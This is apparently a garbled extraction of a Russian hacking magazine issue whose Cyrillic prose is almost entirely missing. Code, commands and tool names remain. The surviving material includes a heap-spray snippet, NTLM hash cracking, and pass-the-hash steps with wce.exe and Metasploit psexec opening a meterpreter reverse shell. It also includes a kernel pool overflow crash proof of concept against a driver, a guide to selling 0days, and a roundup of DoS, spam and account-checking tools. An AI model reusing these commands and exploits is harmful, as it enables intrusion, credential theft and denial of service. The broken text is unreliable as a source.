JIT-spray Flash, Java, .NET-,

.
Dave Aitel IMMUNITY ,
IE8. :
//
var
h1=new Array();
h1[0] = bigbk + shell;
for (var i = 1 ; i < 300 ; i++) {
h1[i] = h1[0].substring(0,h1[0].length )
}
:).
, .
- .
//
3
044
:
. 10
(Nessus, Retina, Xspider, etc.) , .
X 12 /143/ 10
- ,
. -, :).
, .
,
. ,
.
:
Nessus .
, :).
. , ,
.
. -
.
, .
. ,
, Nessus (tenable.com/nessus/).
,
(, :)). Nessus - . .
:
1) ;
2) Nessus Server Manager ,
;
3) ;
4) https://localhost:8834/.

(policies), (scans). Reports.
, .
, .
, .
, -,
:).
:
, - . , .
, ;
spider ; , CMS .
.
- ,
.
- ,
. ,
,
.
, -
, -, ( , ).
.
:).
,
, .
Sensepost 6
Perl BiLE-suite
X 12 /143/ 10
Nessus
(sensepost.com/cms/resources/labs/tools/misc/BiLE-suite.tgz).
BiDiBLAH.
BiLE-suite ,
DNS. BiLE.pl BiLEweigh.pl.
, ,
link:, ,
. , ,
. BiLE-weigh
,
. ; ,
,
( ).
HTTrack (httrack.com/page/2/en/index.html).
HTTrack -, BiLE
, .
HTTrack Win, *nix. BiLE-suite , , .
, BackTrack4 .
, HTTrack:
#tar xvfz httrack-3.43-9C.tar.gz
#./configure && make && su -c 'make install'
045
, webhttrack ,
, .
BiLE-weigh.pl:
:
`cat temp | sort -r -t ":" +1 -n > @ARGV[1].sorted`;
:
`cat temp | sort -r -t ":" --key=2 > @ARGV[1].sorted`;
, $mc 67
BiLE.pl. , swf-,
, HTTrack Win.
BiLE backtrack-linux.org:
perl BiLE.pl www.backtrack-linux.org BT
www.backtrack-linux.org ;
BT .
, BT.mine BT.warus,
.
:
perl BiLE-weigh.pl www.backtrack-linux.org BT.mine
: NTLM/LM
:
. , . ?
:). , .
, Windows- LSA- SAM-.
, , Windows .
NTLM LM- . , MD4 DES- .
, LSA- SAM- ( )
.
, .
,
- DLL-, SeDebugPrivilege.
.
- .

, www.backtrack-linux.org
BT.mine.sorted. , :).
, NTLM, , . ,
(, ) .
. , Windows , pwdump, ,
NTLM- challenge, smb_sniff
Metasploita (. ). ?
,
-, Cain&Abel (oxid.it/cain.html).
, ( Cracker)
:
1) ;
2) ;
3) .
. LM-,
. , -, , . , -,
7 , .
, 14 .
, ,
.
. NTLM-,
. C LM-
:
, LM- ;
15 , LM-;

cp866.
, Cain
(. ):
;
;
.
046
X 12 /143/ 10
,
Challenge. smb_relay hallenge 1122334455667788.
, , (rainbow tables). ,
habrahabr.ru/blogs/algorithm/82941/, .
,
.
, ,
.
( ), , . rtgen.exe
RainbowCrack (project-rainbowcrack.com/index.htm),
winrtgen.exe Cain. , ,
.
RainbowCrack.
, , (salt) - (, , )
.
. ,
c . NTLM-,
NTLM+challenge-.
:
WINDOWS NTLM/
LM-
logon:
>wce.exe e
10 :
>wce.exe r10
:
>wce.exe o ntlms.txt
:
, .
, , , - .
, ,
. ,
, - . , .. ,
. , NTLM,
, . . .

:). , 1997 .
Pass The Hash. .
.
. Hernan Ochoa (oss.coresecurity.
com/pshtoolkit/doc/index.html hexale.blogspot.com) ,
Metasploit.
pshtoolkit WCE:
Windows Credentials Editor (www.ampliasecurity.com/research/wce_
v1.0.tgz).
.
, WCE.
NTLM/LM- .
/ , :
> wce.exe -s user:Victim:1F27ACDE849935B0AAD3B435B5140
4EE:579110C4914
5015C47ECD267657D3174 -c "c:\Program Files\Internet
Explorer\iexplore.exe"
-s user,
Victim LM- NTLM-, - , ( ).
Metasploit, , .
pth:
msf>use exploit/windows/smb/psexec
IP :
msf>set PAYLOAD windows/meterpreter/reverse_tcp
msf>set LHOST 192.168.146.129
:
msf>set RHOST 192.168.0.101
, :
msf>set SMBUser
"LM:NTLM" :
msf>set SMBPass 1F27A.04EE:579.2676
:
msf>exploit
, :
>wce.exe l
Meterpreter.
z
Pass The Hash Metasploit Framework
X 12 /143/ 10
047

CISS Research Team,
WINDOWS
KERNEL POOL OVERFLOW
,
,
. ,
,
, ,
, ,
, 0day-.

Memory Management
. , ,
, , .
,
safe unlinking.
, , ,
.
.
ms08-001 - IGMPv3 Kernel Pool Overflow
tcpip.sys;
ms09-006
wmf/emf, win32k.sys;
ms10-058 integer overflow ,
tcpip.sys.
, Windows (
, ) -
048
/ . ,
. Intel x86
4096 .
. ,
ExAllocatePoolWithTag ExFreePoolWithTag, .
,
. ,
.

Paged NonPaged pool
.
. , ,
(, ?). Paged pool
(swap). NonPaged pool ,
IRQL.
pagefile.sys paged-.
, X 12 /143/ 10
Vista.
paged-.

,

. Microsoft
, Windows, Paged- NonPaged-.
NonPaged pool,
Paged-Pool .
NonPaged pool
heap. Microsoft Windows
Internals.
NonPaged pool
. ,
.

. , Windows

. , . ,
.

.
.
NonPaged lookaside ,
,
256 . (PCR), IRQL, GDT, IDT.
(PCRB)
lookaside-.
Lookaside-

.
, (
Lookaside) , .
ExInterlockedPopEntrySList
WinDbg
X 12 /143/ 10
lock. PPNPagedLookasideList
Lookaside-.
Lookaside-: P L. depth
GENERAL_LOOKASIDE ,
ListHead.
, .

P L. P depth , L, P
.

, . ,
4080 ,
lookaside- .
, POOL_DESCRIPTOR.
PoolVector
NonPagedPoolDescriptor.
,
ExpNonPagedPoolDescriptor 16
. PCRB
KNODE.
color,
ExpNonPagedPoolDescriptor. , .

ExpNumberOfNonPagedPools,
.
.
WinDbg POOL_DESCRIPTOR
(. ). spinlock' ; HAL

(pool descriptor).

. HAL
. NonPaged spinlock
(LockQueueNonPagedPoolLock). ,
spinlock.
, 4080 .
MmNonPagedPoolFreeListHead ,
.

NonPaged spinlock',
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
.
.
MmNonPagedPoolFreeListHead.
HTTP://WWW
links
1. phrack.org/issues.
html?issue=65&id=4
2. Subverting VistaTM
Kernel For Fun And
Profit by Joanna
Rutkowska
invisiblethings.org/
papers/joanna%20rutkowska%20-%20subverting%20vista%20
kernel.ppt
3. Vista RC2 vs. pagefile attack by Joanna
Rutkowska
theinvisiblethings
blogspot.com/
2006/10/
vista-rc2-vs-pagefileattack-and-some.
html
4. Windows Heap
Overflows - David
Litchfield
blackhat.com/presentations/win-usa-04/
bh-win-04-litchfield/
bh-win-04-litchfield.
ppt
049

, , heap .

. , , .

(. ).

,
BugCheck' (, , BSOD'):
BAD_POOL_HEADER. ExFreePoolWithTag,
PreviousSize BlockSize
.
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the
current request. This may or may not be due to the
caller. The internal pool links must be walked to
figure out a possible cause of
the problem,
and then special pool applied to the suspect tags or
the driver verifier to a suspect driver.
Arguments:
Arg1: 00000020, a pool block header size is corrupt.
Arg2: 812c1000, The pool entry we were looking for
within the page. <----
Arg3: 812c1fc8, The next pool entry. <----
,
Arg4: 0bf90000, (reserved)
DRIVER_CORRUPTED_EXPOOL.
ExFreePoolWithTag, unlink'e
Page Fault.
DRIVER_CORRUPTED_EXPOOL (c5)
An attempt was made to access a pageable (or
completely invalid) address at an
interrupt request level (IRQL) that is too high.
This is caused by drivers that have corrupted the
system pool. Run the driver verifier against any
new (or suspect) drivers, and if that doesn't turn
up the culprit, then use gflags to enable special
pool.
Arguments:
Arg1: 43434343, memory referenced <----- Blink'a
Arg2: 00000002, IRQL
050
POOL_DESCRIPTOR
Arg3: 00000001, value 0 = read operation, 1 = write

operation
Arg4: 80544d06, address which referenced memory
BAD_POOL_CALLER. ExFreePoolWithTag,
, , . () :

typedef struct _POOL_HEADER
{
union
{
struct
{
USHORT PreviousSize : 9;
USHORT PoolIndex : 7;
USHORT BlockSize : 9;
USHORT PoolType : 7;
}
ULONG32 Ulong1;
}
union
{
struct _EPROCESS* ProcessBilled;
ULONG PoolTag;
struct
{
USHORT AllocatorBackTraceIndex;
USHORT PoolTagHash;
}
}
} POOL_HEADER, *POOL_HEADER;
// sizeof(POOL_HEADER) == 8
PreviousSize, BlockSize :
PreviousSize = (____
+ sizeof(POOL_HEADER)) / 8
BlockSize = (___
+ sizeof(POOL_HEADER)) / 8
PoolType , , nt!_LIST_ENTRY.
kd> dt nt!_LIST_ENTRY
+0x000 Flink : Ptr32 _LIST_ENTRY
+0x004 Blink : Ptr32 _LIST_ENTRY
,
, X 12 /143/ 10

MiFreePoolPages
,
C
,

>0xFF0
false
MemoryBlock

NewMemoryBlock
true
<=0x100
<0xFF0

MmNonPagedPoolFreeListHead

-
Poolindex POOL_HEADER,
, PoolDescriptor
;
-
LIST_ENTRY
, . unlink'a.
entry :
PLIST_ENTRY b,f;
f=entry->Flink;
b=entry->Blink;
b->Flink=f;
f->Blink=b;
4 :
*() =
*(+4) =
, .
.text:00016330
mov cx, [eax]
; eax
.text:00016333
inc eax
.text:00016334
inc eax
.text:00016335
test cx, cx
.text:00016338
jnz short loc_16330
.text:0001633A
sub eax, edx
.text:0001633C
sar eax, 1
.text:0001633E
lea eax, [eax+eax+50h]
; UNICODE + 0x50
.text:00016342
movzx edi, ax
; , WORD
.text:00016345
.text:00016345 loc_16345:;
.text:00016345
movzx eax, di
.text:00016348
push ebx
.text:00016349
xor ebx, ebx
.text:0001634B
cmp eax, ebx
>0xFF0
depth
PPNPagedLookasideList
,

.text:0001634D
jz short loc_16359
.text:0001634F
push eax; -
.text:00016350
push ebx; (NonPaged)
.text:00016351
call ds:ExAllocatePool
; chunk'a
.text:00016357 mov ebx, eax
[..]
.text:000163A6 movzx esi, word ptr [edx]
.text:000163A9 mov [eax+edx], si
;
.text:000163AD inc edx
.text:000163AE inc edx
.text:000163AF test si, si
[..]
.text:000163F5 push ebx; P
.text:000163F6 call sub_12A43
.text:00012A43 sub_12A43 proc near
; CODE XREF: sub_12C9A+5Cp
.text:00012A43
.text:00012A43 P = dword ptr 4
.text:00012A43
.text:00012A43 cmp esp+P], 0
.text:00012A48 jz short locret_12A56
.text:00012A4A push 0; Tag
.text:00012A4C push [esp+4+P]; P
.text:00012A50 call ds:ExFreePoolWithTag
; , write4
C-
len = wsclen(attacker_controlled);
total_len = (2*len + 0x50) ;
size_2_alloc = (WORD)total_len; // integer wrap!!!
mem = ExAllocatePool(size_2_alloc);
....
wcscpy(mem, attacker_controlled); //
...
Number of Bytes
<0x100
(<0xFF0)&(>0x100)

MiAllocatePoolPages
PPNPagedLookasideList

X 12 /143/ 10
051
:)
ExFreePool(mem); // , , ,
, ,
,
ring0-shellcode
, , , -
. ,
- 0xffff .
BSoD
hDevice = CreateFileA("\\\\.\\KmxSbx",
GENERIC_READ|GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
0,
NULL);
inbuff = (char *)malloc(0x1C000);
if(!inbuff)
{
printf("malloc failed!\n");
return 0;
}
memset(inbuff, 'A',0x1C000-1);
memset(buff+0x11032, 0x00, 2);
//end of unicode, size to allocate 0xff0
ioctl = 0x88000080;
first_dword = 0x400;
memcpy(buff, &first_dword, sizeof(DWORD));
DeviceIoControl(hDevice, ioctl, (LPVOID)inbuff,
0x1C000, (LPVOID)inbuff, 0x100, &cb,NULL);
, . ,
( ) ( 0xffff), ExFreePoolWithTag (, ,
):
Arg4: 00000000, (reserved)

eax=00029fa8 ebx=fe8a7008 ecx=00000008 edx=fe880058
esi=00004141 edi=fe87d094
eip=f0def3a9 esp=f0011b78 ebp=f0011bac iopl=0
nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000
efl=00010206
KmxSbx+0x63a9:
f0def3a9 66893410
mov word ptr [eax+edx],si
ds:0023:fe8aa000=???? <---- ,

, - ,
( BSoD).

: N , DeviceIoControl, ,
- N
(0xff0 ) , ,
Page Fault (PAGE_FAULT_IN_NONPAGED_AREA).

DVD.
,
Kernel Pool Overflow. ,
, -
, , , BSoD.
,
, , .
Kernel Pool Overflow, , ,
:). Stay tuned! z
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be
protected by try-except,
it must be protected by a Probe. Typically the
address is just plain bad or it
is pointing at freed memory.
Kernel Pool Overflow

Our chunk
Header
Arguments:
Arg1: fe8aa000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write
operation.
Arg3: f0def3a9, If non-zero, the instruction address
which referenced the bad memory address.
052
Overflow
Chunk we overflow
Next
List
Header Entry
Potential list entry
depending on chunk type
,

X 12 /143/ 10
>> coding
http://lotus.xakep.ru
X-testing ontest

IBM Lotus Symphony 3.
Lotusphere 2011 !
DVD

Lotus Symphony 3

,
Lotus Symphony 3. :
, ,
! : lotus.xakep.ru.

r0064 r0064@mail.ru
WFP
Windows
Filtering Platform
WFP, Windows Vista,
(
). ,

.
WFP,
.

. Callout WFP .
, callout: classifyFn, notifyFn,
flowDeleteFn (. FWPS_CALLOUT).
classifyFn ( ): , , , / . notifyFn ( )
. -
054
. FwpsCalloutRegister,
32- .
, , .
WinDbg,
Windows Vista x64, Ida Pro,
. ()
.reload /s /n. ,
WFP,
X 12 /143/ 10
ipsblock!FlClassify ;->
NETIO!ArbitrateAndEnforce+0x3b0
NETIO!KfdClassify+0x8f1
tcpip!WfpAleClassify+0x47
tcpip! ?? ::FNODOBFM::'string'+0x178d3
tcpip!WfpAleAuthorizeConnect+0x2ef
tcpip!TcpCreateAndConnectTcbWorkQueueRoutin
e+0x4a2
tcpip!TcpCreateAndConnectTcb+0x48a
tdx!TdxConnectConnection+0x4e6
tdx!TdxTdiDispatchInternalDeviceControl+0
x158
enuma
. callout ( , ,
callout).
Call Stack
( WinDbg <Alt+6>
), ,
. ,
. Call
Stack.
links
Windows Filtering
Platform
MS:
msdn.microsoft.
com/en-us/library/
aa366510(VS.85).aspx
NETIO!ArbitrateAndEnforce (
).
.
fffffa60`00b9e9ef
add rbp,rbp
fffffa60`00b9e9f2
lock xadd dword ptr
[r12+rbp*8+80h],eax
fffffa60`00b9e9fc
cmp qword ptr [r12+80h],r9
fffffa60`00b9ea04
jne NETIO! ??
::FNODOBFM::'string'+0x6719
fffffa60`00b9ea0a
mov rax,qword ptr [NETIO!gWfpGlobal]
fffffa60`00b9ea11
cmp ebx,dword ptr [rax+970h] ; max
count
fffffa60`00b9ea17
ipsblock!FlNotify ;->
NETIO!FeNotifyFilter+0x3a
NETIO!HandleFilterFree+0x1f
NETIO!DeleteFilterFromIndex+0x22b
NETIO! ?? ::FNODOBFM::`string'+0x6f03
NETIO!IoctlKfdCommitTransaction+0x39
HTTP://WWW
jae NETIO! ??
fffffa60`00b9ea1d
imul rbx,rbx,38h
fffffa60`00b9ea21
add rbx,qword ptr [rax+978h]
// add callout base

fffffa60`00b9ea28
cmp dword ptr [rbx],0
// callout?
fffffa60`00b9ea2b
je NETIO! ??
, .
FeNotifyFilter. , :
fffffa60`00bac100
fffffa60`00bac104
fffffa60`00bac107
fffffa60`00bac10a
fffffa60`00bac10f
[rbx+2Ch]
fffffa60`00bac112
fffffa60`00bac115
NETIO!FeGetRefCallout
sub
mov
mov
lea
mov
rsp,20h
rbx,rdx
rdi,rcx
rdx,[rsp+38h]
ecx,dword ptr
mov esi,r8d
call
(fffffa60`00ba3060)
fffffa60`00bac11a
mov r8,rbx
fffffa60`00bac11d
mov rbx,qword ptr
[rsp+38h]
;
fffffa60`00bac122
mov rdx,rdi
fffffa60`00bac125
mov ecx,esi
call qword ptr
fffffa60`00bac127
[rbx+10h]
; ipsblock!FlNotify
fffffa60`00bac12a
test eax,eax
...
fffffa60`00b9eacb
lea rax,[rsp+78h]
fffffa60`00b9ead0
mov rdx,r15
fffffa60`00b9ead3
mov qword ptr [rsp+28h], rax
fffffa60`00b9ead8
mov qword ptr [rsp+20h], r12
fffffa60`00b9eadd
call qword ptr [rbx+8]
,
. ,
callout
NETIO!gWfpGlobal
.
call-stack WinDbg
.
(FlClassify).
:
X 12 /143/ 10
055

WFP msdn
ebx
.
, ebx
,
fffffa60`00b9ea11.
, ? ,
,
callout
32- ?
,
ebx. ,
- , dword ptr
[rax+970h]

( 0x11e). ebx
,
,
(
imul rbx,rbx,38h) 0x38
. qword ptr
[rax+978h]

(
WFP wdk
-).

. gWfpGlobal ( dq poi(netio!gWfpGlobal) WinDbg).
typedef struct _FW_CALLOUT_OBJECT
{
ULONG64 uFlag;
ULONG64 uClassifyFunction;
ULONG64 uNotifyFunction;
ULONG64 uFlowDeleteFunction;
056
//ULONG64 uReserved[3];
}FW_CALLOUT_OBJECT,*PFW_CALLOUT_OBJECT;
#define CALLOUT_OBJECT_SIZE 0x38
....
VOID PrintCallouts6(ULONG64 gWfpGlobal)
{
ULONG uMaxCount;
ULONG64 uCalloutBase;
PFW_CALLOUT_OBJECT pCurrentCallout;
//
uCalloutBase = *(PULONG64)(gWfpGlobal+0x978);
//
uMaxCount = *(PULONG)(gWfpGlobal + 0x970);
CHAR ModuleName[10]={0};
FLOUT(DPFLTR_IHVDRIVER_ID,
DPFLTR_ERROR_LEVEL,
"Max id count %d\n",
uMaxCount);
for(int i=0;i<uMaxCount;i++)
{
pCurrentCallout = (PFW_CALLOUT_OBJECT)
(uCalloutBase + i*CALLOUT_OBJECT_SIZE);
if(pCurrentCallout->uFlag)
{
DPFLTR_ERROR_LEVEL,
"Current callout 0x%I64X\n",
pCurrentCallout);
DPFLTR_ERROR_LEVEL,
" Notify routine 0x%I64X\n Classify
routine 0x%I64X\n Flow delete function 0x%I64X\n",
pCurrentCallout->uNotifyFunction,
pCurrentCallout->uClassifyFunction,
X 12 /143/ 10
netio.sys Ida

pCurrentCallout->uFlowDeleteFunction);
// ,
GetModuleName(ModuleName,
8,
pCurrentCallout->uClassifyFunction);
DPFLTR_ERROR_LEVEL,
" Module name = %s\n",
ModuleName);
RtlZeroMemory(ModuleName,sizeof(ModuleName));
}
}
}
, .
FW_CALLOUT_
OBJECT. GetModuleName ,
.
ZwQuerySystemInformation(... SystemModuleInformation...) ,
, ,
:).
, ,
, . , . ,
, , ,
, , WinDbg, u .
Notify routine 0xFFFFFA6000E113B0
Classify routine 0xFFFFFA6000E35070
Flow delete function 0x0
Module name = tcpip.sys
...
kd> u 0xFFFFFA6000E113B0 ;->
tcpip.sys?
tcpip!IPSecAleConnectCalloutNotify:
fffffa60`00e113b0 33c0
xor eax,eax
kd> u 0xFFFFFA6000E35070 ;->
tcpip.
sys?
tcpip!IPSecInboundTransportFilterCalloutClassifyV4:
mov rax,rsp
fffffa60`00e35070 488bc4
, .
Vista Windows 7
Windows 7, , ( -!). , WFP

.
netio!ProcessCallout:
X 12 /143/ 10
.text:000000000001C680 ProcessCallout proc near

; CODE XREF: ArbitrateAndEnforce+2A457
...
rax, cs:gWfpGlobal
.text:000000000001C71D mov
.text:000000000001C724 cmp
ebx, [rax+548h]
// max count
.text:000000000001C72A jnb
loc_2D270
rdi, rbx
.text:000000000001C730 mov
rdi, 6 // callout size
.text:000000000001C733 shl
.text:000000000001C737 add
rdi, [rax+550h]
// callout base
.text:000000000001C73E cmp
[rdi+4], esi
loc_2D270
.text:000000000001C741 jz
...
.text:000000000001C7E6 mov
r10, [rdi+10h]
.text:000000000001C7EA mov
rbx, qword ptr
[rsp+118h+arg_30.LockState]
.text:000000000001C7F2 mov
r8, [rsp+118h+arg_18]
.text:000000000001C7FA mov
rcx, [rsp+118h+arg_8]
.text:000000000001C802 mov
rdx, rbp
.text:000000000001C805 cmp
[rdi], esi
.text:000000000001C807 jz
loc_2D56F
.text:000000000001C80D mov
[rsp+118h+var_E8], rbx
.text:000000000001C812 mov
r9, r13
.text:000000000001C815 mov
[rsp+118h+var_F0], r14
.text:000000000001C81A mov
[rsp+118h+var_F8], rax
.text:000000000001C81F call
r10 // Classifyfn
, gWfpGlobal
WFP Win7, Vista. 0x40 (shl rdi, 6, * 2^6),
callout base ([rax+550h]) . enum
Win7 for fun :).
netio GetCalloutEntry, :
.text:000000000001CE30 GetCalloutEntry proc near
; CODE XREF: FeGetRefCallout+2057
; FeGetCalloutFlowDelete+28 ...
.text:000000000001CE30
.text:000000000001CE30 ; FUNCTION CHUNK AT
.text:0000000000028954 SIZE 0000000B BYTES
.text:000000000001CE30
rax, cs:gWfpGlobal
.text:000000000001CE30 mov
ecx, [rax+548h]
.text:000000000001CE37 cmp
// max count
.text:000000000001CE3D jnb
loc_28954
rax, [rax+550h]
.text:000000000001CE43 mov
// callout base
.text:000000000001CE4A mov
ecx, ecx
rcx, 6
.text:000000000001CE4C shl
// callout object size
.text:000000000001CE50 add
rcx, rax
.text:000000000001CE53 mov
[rdx], rcx
dword ptr [rcx+4], 0
.text:000000000001CE56 cmp
.text:000000000001CE5A jz
loc_28954
.text:000000000001CE60 rep retn
.text:000000000001CE60 GetCalloutEntry endp
, , WFP, . WFP, .
WFP WDK,

. z
057

Norseev@gmail.com

.
.
. , , ,
(
) , .
?
,

( ,
): - ,
OEP, ,
!
. ,
ImpRec, , (, ). ,
ImpRec (, , - ) , , ,
.
. ? ? ,
( ), . ,
(, Hex PE-).
058
( ) DataDirectory. (
RVA-) 80h
PE- .
IMAGE_IMPORT_DESCRIPTOR, :
struct IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
}
X 12 /143/ 10
FirstThunk
IMAGE_IMPORT_
DESCRIPTOR, .

:
Name ;
FirstThunk IMAGE_THUNK_
DATA32.
.
IMAGE_THUNK_DATA32 :
struct IMAGE_THUNK_DATA32 {
union {
DWORD ForwarderString;
DWORD Function;
DWORD Ordinal;
DWORD AddressOfData;
} u1;
}

(
). .
PE-,
IMAGE_IMPORT_DESCRIPTOR, ( Name)
FirstThunk (
, ,
). ( ,
) .
FirstThunk API-.
,
,
X 12 /143/ 10
exe-. ?
,
. ThunkValue?
.
: ,
FirstThunk
, , .
FirstThunk
( ) , .
?
:
1) DataDirectory ;.
2) IMAGE_IMPORT_DESCRIPTOR FirstThunk;.
3) FirstThunk, ,
, ,
, (
),
access violation,

.
,
FirstThunk. ,
, () , ,
.

,
FirstThunk. ,
:
(, ,
DataDirectory), (- ).
? -,
; , ,
,
GetMessage, DispatchMessage, CreateWindow .. (
). -,

. ,
.
( ) .
:
, (
059
7Eh 4h FirstThunk
API-
, ). 99,9 %
, ,
HEX-. ,
. ,
.

FirstThunk
. , PE-
.
. , ASLR
, ASLR . RVA 01000000h,
.
. :
1) (
).
2)
(, user32 7Eh).
3) ;
4h
FirstThunk.
: API-?. , . : - ,
A, B, C. , C, ,
, B. API- ,
-
.
,
, .
FirstThunk . ,
API- ,
, jmp
( , ,
FirstThunk).
.
FirstThunk
.
, , .
. :
1) .
060

,
;.
2) , .
API-
( ),
FirstThunk. ,
. . ,
FirstThunk (
), .
3) , ,
. .
, , ( ,
IMAGE_IMPORT_DECRIPTOR
) .
,
. 2040h (
FirstThunk). Ch (
IMAGE_IMPORT_DESCRIPTOR, ). 204Ch kernel32.dll (
). 4
FirstThunk
kernel32 ( 2000h).
FirstThunk (, ,
, ).
GetModuleHandleA,
5009h, 2, 5007h. FirstThunk.
.
(, , ). , . ,
IMAGE_IMPORT_DESCRIPTOR (
FirstThunk ), N
, (N+1)*14h .

DataDirectory
.
. , , (
).

? ,
,
X 12 /143/ 10
FirstThunk
, ,
. ,
. z
,
API-
(,
), .
,

. LordPE.
,
Resource Binder,
.
LordPE RVA
X 12 /143/ 10
061

, Digital Security a.sintsov@dsec.ru

,
-, Android
.. .. ,
, -. ,
, , ,
.
,
. ,
, ,
, , , ,
, ,
, ,
062
(, ). ,
, ,

PCI DSS, , , .

. ,
X 12 /143/ 10
, - -. ,
,
, :).
- ( ):
1. // - - .
-. , - ,
, . - . , - ,
, --. ,
:).
( ),
. ,
(

, , , ).
2. -.
1 ,
:). -
-, ,
/ (0day) - $$$.
, .
, , ; ,
...
3. .
,
- .
.
IDS/IPS-,
- . , ,
,
PR ( ) .
, ,
.
, ,
3, .
0day
, 0day.
,
. ,
unsecurityresearch.com. ,
0day- 1000/2000 . ,
30000 . ,
. , , ZDI (Zero
Day Initiative zerodayinitiative.com),
.
, ZDI ,
X 12 /143/ 10
- ZDI
, ( ).
, ZDI ( , TippingPoint, ZDI) PWN to OWN CanSecFest,
.
.
ZDI
TippingPoint
3COM ( , , Hewlett-Packard) IPS, 0day-.
IPS , . ,
ZDI
. , , ZDI
-
. , 0day- ZDI,
TippingPoint
. , ,
.
.
, -
273
, .
, ,
, ZDI
. , PoC-, , ,
, ( , ,
).
NSS -
- -. -0day- Metasploit. , ,
, .
, ,
; ZDI , iDefense
labs.idefense.com, SecuriTeam securiteam.com NetraGard
netragard.com. , FireFox
Google Chrome . ,
, code execution ZDI.
063
...
, . ,
,
. ][ ActiveX-. ,
- , , . , . ZDI ,
:
, ...
Register. ! e-mail, . , ,
Referal. ,
:). 0day, , , ,
, 2500 ( ),
asintsov,
:). , .
My Account .
My Profile. ,
, . ,
, , , , ,
, ZDI . ,
, - , PGP-
e-mail' ZDI. , , e-mail'.
.
Copy of Government
Issued ID. , PDF-, , ,
( ) .
zdi@3com.com,
https://www.zerodayinitiative.com/documents/
zdi-pgp-key.asc ( , ).
, ,
, .
,
. : Western Union, .
WU , ,
. ;
(, ), , SWIFT . ,
. . ,
,
. ,
,
, .
,
,

, XSS-, LFI- SQL-

. , ,
,
. FTP/-,
, , , ActiveX
, ..
, ,
, .
, , ... . , . ,
. Crash-PoC
,
.
, ZDI , ,
. ,
, , .
, ,
.
1.
( ),
ZDI. . ,
. zerodayinitiative.com,
.
Researcher Login. , -
064
X 12 /143/ 10
, . ,
, , , .
2.
, ,
, ? Open
Case . ,
. ,
,
(, ),
(, - ..). ,
, , . ,
, ,
. e-mail'
- -,

. . ,
, , , .
My Cases ,
, .
My Cases
-
, , ,
,
, ZDI.
.
ZDI.
2500 , 2500 ,
.

. ? , , 10000 ,
, 20000 ,
35000 , , 50 000 . ,
@WTFuzz .
,

. .
:
+10%
$1000
X 12 /143/ 10
. ,
, :)
:
+15%
+25%
$5000
( + )
DEFCON -
:
+20%
+50%
$10000
( + )
BlackHat DEFCON -
:
+25%
+100%
$20000
( + )
BlackHat DEFCON - +
BlackHat
, . ,
, .
ActiveX-,
COMRaider', 2500 3000 .
,
. ZDI .
...
- , ZDI. - , ,
/-/ ,
, ZDI . , . ! z
065

icq 884888, http://snipper.ru
X-TOOLS
,

Sourceforge hyenae.
sourceforge.net.
: Puff
: Windows 2000/XP/2003
Server/Vista/2008 Server/7
: Cosimo Oliboni
!
, Puff
members.fortunecity.it/
blackvisionit/PUFFV200.HTM.

,
-
(
).
?
,
zip-,
:). !
,
,
Puff. , Puff
,

.
Puff
:
(BMP, JPG, PCX, PNG, TGA);
(AIFF, MP3, NEXT/SUN, WAV);
(3GP, MP4, MPG, VOB);
(FLV, SWF);
,
(EXE, DLL).
:
, ,
(CAST-256, IDEA-NXT, SAFER,
RIJNDAEL, MARS, RC6, SERPENT, TWOFISH
).
:
;
(512-
);

512 ;
;
.
066
: Hyenae
: *nix/win
: Robin Richter

:). , Hyenae
, Ethernet (MITM, DoS DDoS).

.
, ,
, IP .

:
ARP-Request ;
ARP-Cache ;
PPPoE-;
PPPoE-;
ICMP-Echo ;
ICMP-Smurf ;
TCP- ICMP;
TCP-SYN ;
TCP-Land ;
TCP-;
UDP-;
DNS-Query ;
DHCP-Discover ;
DHCP ;
DHCP-Release;
Cisco HSRP active .
Hyenae
IPv4/IPv6,
,
, ,
.
: CmosPwd
: *nix/win
: Christophe Grenier

BIOS.

CmosPwd,
, cmos
BIOS SETUP.
BIOS':
ACER/IBM BIOS;
AMI BIOS;
AMI WinBIOS 2.5;
Award 4.5x/4.6x/6.0;
Compaq (1992);
Compaq (New version);
IBM (PS/2, Activa, Thinkpad);
Packard Bell;
Phoenix 1.00.09.AC0 (1994), a486 1.03,
1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06
rev 1.13.1107;
Phoenix 4 release 6 (User);
Gateway Solo - Phoenix 4.0 release 6;
Toshiba;
Zenith AMI.

, ,
/
cmos.
CmosPwd:
cmospwd.exe [/d] // cmos ascii +

cmospwd.exe [/d] /[rlw] cmos__
////
cmos
cmospwd.exe /k // cmos
cmospwd.exe /m[01]* //

cgsecurity.org/
cmospwd.txt,
cgsecurity.org/wiki/CmosPwd.
: DSGood Checker
: NightEagle
X 12 /143/ 10

DSGood Checker.

/
:
1. ( :
ip:login;pass);
2. (
);
3. ;
4. ;
5.
.
:
;
;
.NET Framework
3.5;
- ;
,
;
.

forum.
asechka.ru/showthread.php?t=120148.
: The spamer from

Reliable
: Reliable
,
.
: ,
e-mail -.
:
e-mail;
;
e-mail-;
;
(
mail-);
;
;
X 12 /143/ 10

;

;

;
SMTP-;
(, , );
;
(
);
.Net Framework 2.0.
SMTP-
(
smtp.ini):
smtp.mail.ru, smtp.inbox.ru, smtp.
bk.ru, smtp.list.ru, smtp.yandex.ru,
smtp.rambler.ru, smtp.hotmail.com,
smtp.gmail.com

: icq-email-vkontakte.ru/forum/
showthread.php?t=4788.
P.S. , !

.
: Poker Checker
: DDM

Poker Checker.
(
Windows-) / -,
:).

,
Poker
.

:
fulltiltpoker.com, pokerstars.
com, partypoker.com, titanpoker.
com, pacificpoker.com, redstarpoker.
Windows XP
com, leonpoker.com, noblepoker.com,
williamhillpoker.com, heypoker.com
,
5 7 ,

.
: Half-open limit fix

(patch) for Windows
: Windows XP
: half-open.com

,
Windows XP / Half-open limit fix.

TCP-
(half-open connections connection attempts)
tcpip.sys.

Microsoft SP2 (Service Pack 2)
Windows XP.
, DoS-.
, 10 .
.

.
Half-open limit fix ,
.
, 100. z
067
MALWARE
, Senior Malware Analyst, Heuristic detection group, Kaspersky Lab
Trojan
- Cl
icker.Win32.
Trojan-Clicker.Win32.
Whistler -
Trojan-Clicker.Win32.
